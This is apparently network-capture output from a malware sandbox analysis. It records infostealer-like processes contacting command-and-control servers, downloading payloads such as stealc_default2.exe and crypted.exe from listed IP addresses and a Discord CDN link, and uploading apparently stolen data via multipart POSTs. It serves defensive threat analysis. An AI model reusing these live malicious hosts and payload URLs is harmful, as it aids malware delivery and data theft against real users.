                                                                                                                                                cdn.discordapp.com
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                162.159.129.233
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                162.159.130.233
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                162.159.133.233
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                162.159.135.233
                                                                                                                                                cdn.discordapp.com
                                                                                                                                                IN A
                                                                                                                                                162.159.134.233
                                                                                                                                              • flag-us
                                                                                                                                                GET
                                                                                                                                                https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                162.159.129.233:443
                                                                                                                                                Request
                                                                                                                                                GET /attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b& HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Host: cdn.discordapp.com
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:12 GMT
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                Content-Length: 7596406
                                                                                                                                                Connection: keep-alive
                                                                                                                                                CF-Ray: 8c3e4d8ea856cd8d-LHR
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Accept-Ranges: bytes, bytes
                                                                                                                                                Age: 6969
                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                Content-Disposition: attachment; filename="setup.exe"
                                                                                                                                                ETag: "f749bd4f76ac073c55a3b937e6b7eac1"
                                                                                                                                                Expires: Tue, 16 Sep 2025 05:02:12 GMT
                                                                                                                                                Last-Modified: Mon, 16 Sep 2024 03:05:29 GMT
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                x-goog-generation: 1726455929025847
                                                                                                                                                x-goog-hash: crc32c=jw3GXw==
                                                                                                                                                x-goog-hash: md5=90m9T3asBzxVo7k35rfqwQ==
                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                x-goog-storage-class: STANDARD
                                                                                                                                                x-goog-stored-content-encoding: identity
                                                                                                                                                x-goog-stored-content-length: 7596406
                                                                                                                                                x-guploader-uploadid: AD-8ljs0l2XUZUJmIdg7bHqCaQOuqkC9iUV5YE3gaO-glU49f3iZBoAGO0JGXGmfXYFZ59MHmvGWp_iORA
                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                Set-Cookie: __cf_bm=dSDzMXUdQ0.y_NepSq_vKdqankWxaH.GQjfJRqZ4I.M-1726462932-1.0.1.1-zD5MUAgGjf1QGJg_NTi4PQHzw4866KuLWsGRnRssJG20nr_29vlFuAhnNQhg_J4tKgjXVld3l8W_SukBmxQl1A; path=/; expires=Mon, 16-Sep-24 05:32:12 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FiMiN4LY06bToEIxs8OsAnDIitljhneJMXJPmqguAGE1%2B8E6I6rNP2yIcpLIx9oihv1d2MIeqkcGu7Xr7cqYxikdHtFj45HLPAqwoxkOuwviTwlM67%2BCSdOEC2zqsF3xQhTOGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Set-Cookie: _cfuvid=znOLqr7bW2yzgDDtucQkgZpfvt5K5Js5smF.27aYN2w-1726462932303-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                Server: cloudflare
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                2.exe
                                                                                                                                                Remote address:
                                                                                                                                                188.225.44.114:80
                                                                                                                                                Request
                                                                                                                                                POST /v1/upload.php HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Content-Type: multipart/form-data; boundary=----Boundary48577504
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 24106
                                                                                                                                                Host: fivevd5vs.top
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:13 GMT
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                conditionprovice.pro
                                                                                                                                                acentric.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                conditionprovice.pro
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                conditionprovice.pro
                                                                                                                                                IN A
                                                                                                                                                81.19.139.138
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php?scr=1
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.19:80
                                                                                                                                                Request
                                                                                                                                                POST /CoreOPT/index.php?scr=1 HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----NzU2MDc=
                                                                                                                                                Host: 185.215.113.19
                                                                                                                                                Content-Length: 75759
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:36 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.19:80
                                                                                                                                                Request
                                                                                                                                                POST /CoreOPT/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.19
                                                                                                                                                Content-Length: 4
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:33 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php
                                                                                                                                                Waters.pif
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.19:80
                                                                                                                                                Request
                                                                                                                                                POST /CoreOPT/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.19
                                                                                                                                                Content-Length: 156
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:34 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                service-domain.xyz
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                service-domain.xyz
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                service-domain.xyz
                                                                                                                                                IN A
                                                                                                                                                54.210.117.250
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                c.pki.goog
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                c.pki.goog
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                c.pki.goog
                                                                                                                                                IN CNAME
                                                                                                                                                pki-goog.l.google.com
                                                                                                                                                pki-goog.l.google.com
                                                                                                                                                IN A
                                                                                                                                                142.250.179.227
                                                                                                                                              • flag-gb
                                                                                                                                                GET
                                                                                                                                                http://c.pki.goog/r/r1.crl
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                142.250.179.227:80
                                                                                                                                                Request
                                                                                                                                                GET /r/r1.crl HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                                                Host: c.pki.goog
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                                Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                                Content-Length: 854
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                Server: sffe
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Date: Mon, 16 Sep 2024 04:37:43 GMT
                                                                                                                                                Expires: Mon, 16 Sep 2024 05:27:43 GMT
                                                                                                                                                Cache-Control: public, max-age=3000
                                                                                                                                                Age: 1588
                                                                                                                                                Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                                                                Content-Type: application/pkix-crl
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                o.pki.goog
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                o.pki.goog
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                o.pki.goog
                                                                                                                                                IN CNAME
                                                                                                                                                pki-goog.l.google.com
                                                                                                                                                pki-goog.l.google.com
                                                                                                                                                IN A
                                                                                                                                                142.250.179.227
                                                                                                                                              • flag-gb
                                                                                                                                                GET
                                                                                                                                                http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGs31zQSL0RFCna%2BsoPon%2Bg%3D
                                                                                                                                                MjytQiW.exe
                                                                                                                                                Remote address:
  142.250.179.227:80
  Request
    GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGs31zQSL0RFCna%2BsoPon%2Bg%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: o.pki.goog
  Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 471
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Mon, 16 Sep 2024 04:20:07 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 2644
• [GB] GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3D
  MjytQiW.exe
  Remote address: 142.250.179.227:80
  Request
    GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: o.pki.goog
  Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 471
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Mon, 16 Sep 2024 04:38:28 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 1544
• [GB] GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoX
  MjytQiW.exe
  Remote address: 142.250.179.227:80
  Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoX HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: o.pki.goog
  Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Mon, 16 Sep 2024 04:08:53 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 3319
• [US] DNS clients2.google.com
  MjytQiW.exe
  Remote address: 8.8.8.8:53
  Request
    clients2.google.com IN A
  Response
    clients2.google.com IN CNAME clients.l.google.com
    clients.l.google.com IN A 216.58.204.78
• [GB] GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCR
  MjytQiW.exe
  Remote address: 216.58.204.78:443
  Request
    GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCR HTTP/1.1
    Host: clients2.google.com
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 302 Moved Temporarily
    Content-Security-Policy: script-src 'report-sample' 'nonce-_ULCUGrRd2-DgkZJnacQTg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 16 Sep 2024 05:04:12 GMT
    Location: https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
    Content-Type: text/html; charset=UTF-8
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Accept-Ranges: none
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
• [US] DNS clients2.googleusercontent.com
  MjytQiW.exe
  Remote address: 8.8.8.8:53
  Request
    clients2.googleusercontent.com IN A
  Response
    clients2.googleusercontent.com IN CNAME googlehosted.l.googleusercontent.com
    googlehosted.l.googleusercontent.com IN A 142.250.200.1
• [GB] GET https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
  MjytQiW.exe
  Remote address: 142.250.200.1:443
  Request
    GET /crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: clients2.googleusercontent.com
  Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Length: 26186
    X-GUploader-UploadID: AD-8ljvlqL7qAMgKPTnepQPyOZ3etfzI19Rjc9PZvJXEFGuj1_BSTU9jPYopGB6epH8EYMNEGi1vsxTcOg
    X-Goog-Hash: crc32c=i5zIOg==
    Server: UploadServer
    Date: Sun, 15 Sep 2024 11:25:22 GMT
    Expires: Mon, 15 Sep 2025 11:25:22 GMT
    Cache-Control: public, max-age=31536000
    Age: 63530
    Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
    ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
    Content-Type: application/x-chrome-extension
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
• [US] DNS api4.check-data.xyz
  rundll32.exe
  Remote address: 8.8.8.8:53
  Request
    api4.check-data.xyz IN A
  Response
    api4.check-data.xyz IN CNAME checkdata-1114476139.us-west-2.elb.amazonaws.com
    checkdata-1114476139.us-west-2.elb.amazonaws.com IN A 44.236.110.137
    checkdata-1114476139.us-west-2.elb.amazonaws.com IN A 35.160.60.134
• [US] POST http://api4.check-data.xyz/api2/google_api_ifi
  rundll32.exe
  Remote address: 44.236.110.137:80
  Request
    POST /api2/google_api_ifi HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
    Host: api4.check-data.xyz
    Content-Length: 728
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Access-Control-Allow-Origin: *
    Cache-control: no-cache="set-cookie"
    Content-Type: text/html; charset=UTF-8
    Date: Mon, 16 Sep 2024 05:01:01 GMT
    Server: nginx
    Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
    Content-Length: 0
    Connection: keep-alive
• flag-ru
  POST http://185.215.113.26/Dem7kTu/index.php
  Hkbsse.exe
  Remote address: 185.215.113.26:80
  Request
    POST /Dem7kTu/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.26
    Content-Length: 4
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Sep 2024 05:04:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
• flag-ru
  POST http://185.215.113.26/Dem7kTu/index.php
  Hkbsse.exe
  Remote address: 185.215.113.26:80
  Request
    POST /Dem7kTu/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.26
    Content-Length: 156
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Sep 2024 05:04:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• flag-ru
  POST http://185.215.113.16/Jo89Ku7d/index.php
  axplong.exe
  Remote address: 185.215.113.16:80
  Request
    POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Sep 2024 05:05:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
• flag-ru
  POST http://185.215.113.16/Jo89Ku7d/index.php
  axplong.exe
  Remote address: 185.215.113.16:80
  Request
    POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 156
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Sep 2024 05:05:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• flag-ru
  POST http://185.215.113.19/CoreOPT/index.php
  Waters.pif
  Remote address: 185.215.113.19:80
  Request
    POST /CoreOPT/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.19
    Content-Length: 4
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Sep 2024 05:05:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
• flag-ru
  POST http://185.215.113.19/CoreOPT/index.php
  Waters.pif
  Remote address: 185.215.113.19:80
  Request
    POST /CoreOPT/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.19
    Content-Length: 156
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Sep 2024 05:05:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• flag-ru
  POST http://185.215.113.19/CoreOPT/index.php?scr=1
  Waters.pif
  Remote address: 185.215.113.19:80
  Request
    POST /CoreOPT/index.php?scr=1 HTTP/1.1
    Content-Type: multipart/form-data; boundary=----ODg1MzQ=
    Host: 185.215.113.19
    Content-Length: 88686
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Sep 2024 05:05:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• 185.215.113.16:80
  http://185.215.113.16/Jo89Ku7d/index.php
  http
  axplong.exe
  101.7kB
  4.9MB
  2053
  3498
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: GET http://185.215.113.16/inc/crypteda.exe
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: GET http://185.215.113.16/inc/stealc_default2.exe
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: GET http://185.215.113.16/inc/penis.exe
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: GET http://185.215.113.16/inc/bundle.exe
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: GET http://185.215.113.16/dobre/acentric.exe
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.16/Jo89Ku7d/index.php
  HTTP Response: 200
  HTTP Request: GET http://185.215.113.16/inc/2.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.16/dobre/splwow64.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.16/Jo89Ku7d/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 185.215.113.117:80
                                                                                                                                                http://185.215.113.117/inc/crypted.exe
                                                                                                                                                http
                                                                                                                                                axplong.exe
                                                                                                                                                118.6kB
                                                                                                                                                5.1MB
                                                                                                                                                2346
                                                                                                                                                3631

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.117/inc/gold.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.117/inc/needmoney.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.117/inc/crypted.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 95.179.250.45:26212
                                                                                                                                                RegAsm.exe
                                                                                                                                                912.7kB
                                                                                                                                                23.4kB
                                                                                                                                                685
                                                                                                                                                346
                                                                                                                                              • 65.21.18.51:45580
                                                                                                                                                bhh9YfYYwa.exe
                                                                                                                                                466.1kB
                                                                                                                                                15.2kB
                                                                                                                                                361
                                                                                                                                                160
                                                                                                                                              • 185.215.113.26:80
                                                                                                                                                http://185.215.113.26/Nework.exe
                                                                                                                                                http
                                                                                                                                                axplong.exe
                                                                                                                                                9.7kB
                                                                                                                                                439.0kB
                                                                                                                                                202
                                                                                                                                                318

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.26/Nework.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 185.215.113.26:80
                                                                                                                                                http://185.215.113.26/Dem7kTu/index.php
                                                                                                                                                http
                                                                                                                                                Hkbsse.exe
                                                                                                                                                1.1kB
                                                                                                                                                667 B
                                                                                                                                                13
                                                                                                                                                6

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.26/Dem7kTu/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.26/Dem7kTu/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 95.216.107.53:12311
                                                                                                                                                6InNj3SOTk.exe
                                                                                                                                                465.3kB
                                                                                                                                                18.6kB
                                                                                                                                                373
                                                                                                                                                132
                                                                                                                                              • 185.215.113.17:80
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                http
                                                                                                                                                stealc_default2.exe
                                                                                                                                                185.7kB
                                                                                                                                                5.4MB
                                                                                                                                                3012
                                                                                                                                                3906

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

